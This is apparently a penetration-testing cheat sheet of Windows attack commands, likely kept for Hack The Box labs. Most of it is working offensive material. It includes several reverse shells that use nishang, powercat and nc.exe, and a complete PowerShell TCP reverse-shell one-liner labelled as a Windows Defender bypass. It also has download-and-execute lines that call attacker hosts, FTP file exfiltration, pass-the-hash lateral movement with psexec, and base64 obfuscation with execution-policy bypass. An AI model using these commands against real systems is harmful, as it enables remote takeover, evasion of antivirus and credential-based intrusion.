Useful commands

Reverse Shell File

# Payload
https://podalirius.net/en/articles/windows-reverse-shells-cheatsheet/

# File
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Client

#Add at the end of the file 
Invoke-PowerShellTcp -Reverse -IPAddress <attacker-ip> -Port <attacker-port>

#Host the file 
python3 -m http.server 8888

#Set up listener 
nc -nlvp 4444

Server

powershell IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:4444/shell.ps1')

Client

#Set up listener
nc -nlvp 4444

#Host the file in share folder (run from above)
impacket-smbserver -smb2support share share

Server

#Download the file
copy \\<IP>\share\nc.exe .

#Run command
nc.exe <IP> <PORT> -e cmd

Set up http server with powercat:

powercat path: /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1

python3 -m http.server 8888

Set up listener

nc -nlvp 4444

Execute PowerShell command

IEX (New-Object System.Net.Webclient).DownloadString("http://<ATTACKER_IP>:<FILESERVER_PORT>/powercat.ps1");powercat -c <ATTACKER_IP> -p <ATTACKER_NC_PORT> -e powershell

Windows Defender Bypass

$h = "<IP>"; $p = <PORT>; $c = New-Object Net.Sockets.TCPClient($h, $p); $n = $c.GetStream(); $r = New-Object IO.StreamReader($n); $w = New-Object IO.StreamWriter($n); $w.AutoFlush = $true; $b = New-Object System.Byte[] 1024; while ($c.Connected) { while ($n.DataAvailable) { $d = $n.Read($b, 0, $b.Length); $s = ([text.encoding]::UTF8).GetString($b, 0, $d - 1) }; if ($c.Connected -and $s.Length -gt 1) { $o = try { Invoke-Expression ($s) 2>&1 } catch { $_ }; $w.Write("$o`n"); $s = $null } }; $c.Close(); $n.Close(); $r.Close(); $w.Close()

Reverse shell generator

https://www.revshells.com

File upload

Client

python3 -m http.server 8888

Server

powershell "IEX (New-Object Net.WebClient).DownloadString('http://X.X.X.X:8888/file.ps1')"

(Optional) Downloads folder

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.35:8888/40584.exe',

Set up apache2 service:

sudo systemctl start apache2

Transfer files to the following location:

/var/www/html/

Execute on the windows machine to download the file:

powershell wget -Uri http://<IP>/<FILE> -OutFile <SAVE_DESTINATION/FILE>

File exfiltration

Kali

python3 -m pyftpdlib -p 21 -w

Windows

Check if command is executed via cmd or powershell

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

World writeable paths

c:\windows\system32\microsoft\crypto\rsa\machinekeys
c:\windows\system32\tasks_migrated\microsoft\windows\pla\system
c:\windows\syswow64\tasks\microsoft\windows\pla\system
c:\windows\debug\wia
c:\windows\system32\tasks
c:\windows\syswow64\tasks
c:\windows\tasks
c:\windows\registration\crmlog
c:\windows\system32\com\dmp
c:\windows\system32\fxstmp
c:\windows\system32\spool\drivers\color
c:\windows\system32\spool\printers
c:\windows\system32\spool\servers
c:\windows\syswow64\com\dmp
c:\windows\syswow64\fxstmp
c:\windows\temp
c:\windows\tracing

Check writeable paths script

Get-ChildItem -Directory -Recurse | ForEach-Object { if (Test-Path -Path $_.FullName -PathType Container -ErrorAction SilentlyContinue -OutVariable +global:output -ErrorVariable +global:errvar) { $_.FullName } }

Internal port forwarding

HTB blocks port 22 usage. In order to bypass that set the port to 2222 in sshd_config file. Also during the plink usage you have to specify the port by using -P 2222 flag.

Kali ssh configuration

nano /etc/ssh/sshd_config

Uncomment and change the PermitRootLogin line to:

PermitRootLogin yes

Then enter this command in the terminal

service restart ssh

service ssh start

Connection

Download plink.exe https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

Upload plink to the server using the way described in File Upload section.

Connect to kali ssh.

ssh <gateway> -R <remote port to bind>:<local host>:<local port>

Hit enter multiple times.

Check if port is open on kali localhost

netstat -ano

Connect to the open port using 127.0.0.1 IP on kali

Connections

RDP Connection

Normal

xfreerdp /v:<IP> /u:<USER> /p:<PASSWORD>

Retina display (MAC)

xfreerdp /v:<IP> /u:<USER> /p:<PASSWORD> /scale:180 /scale-desktop:200 /w:2560 /h:1440

Domain

xfreerdp /v:<IP> /u:<DOMAIN>\\<USER> /p:<PASSWORD> /scale:180 /scale-desktop:200 /w:2560 /h:1440

Evil-winrm

In order to use evil-winrm you need username and password of the user. Also make sure ports: 5985 or 5986 are open.

evil-winrm -i <IP_ADDRESS> -u <USERNAME> -p <PASSWORD>

PsExec /wmiexec / smbexec

You can use psexec, smbexec if you have user credentials or NTLM hash. Any folder has to be writeable.

Credentials

impacket-psexec <domain>/<user>:<password>@<victim_ip>

Hash

impacket-psexec <domain>/<user>@<victim_ip> -hashes <LMHash:NTHash> # you can fill LMHash with 32 0

Powershell BASE64 obfuscation

The command is encoded in Unicode (UTF-16) format.

Get the payload

$command = '<COMMAND_TO_ENCODE>'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
echo $encodedCommand

Execute the payload

powershell -enc <ENCODED_PAYLOAD>

Powershell scripts do not run

Run the powershell in bypass mode:

powershell -ep bypass

Windows kernel exploits

https://github.com/SecWiki/windows-kernel-exploits

PreviousWindows NextPort Forwarding and SSH Tunneling

Last updated 1 year ago

hashtagReverse Shell File

hashtagReverse shell generator

hashtagFile upload

hashtagFile exfiltration

hashtagCheck if command is executed via cmd or powershell

hashtagWorld writeable paths

hashtagCheck writeable paths script

hashtagInternal port forwarding

hashtagKali ssh configuration

hashtagConnection

hashtagConnections

hashtagRDP Connection

hashtagEvil-winrm

hashtagPsExec /wmiexec / smbexec

hashtagPowershell BASE64 obfuscation

hashtagPowershell scripts do not run

hashtagWindows kernel exploits

Reverse Shell File

Reverse shell generator

File upload

File exfiltration

Check if command is executed via cmd or powershell

World writeable paths

Check writeable paths script

Internal port forwarding

Kali ssh configuration

Connection

Connections

RDP Connection

Evil-winrm

PsExec /wmiexec / smbexec

Powershell BASE64 obfuscation

Powershell scripts do not run

Windows kernel exploits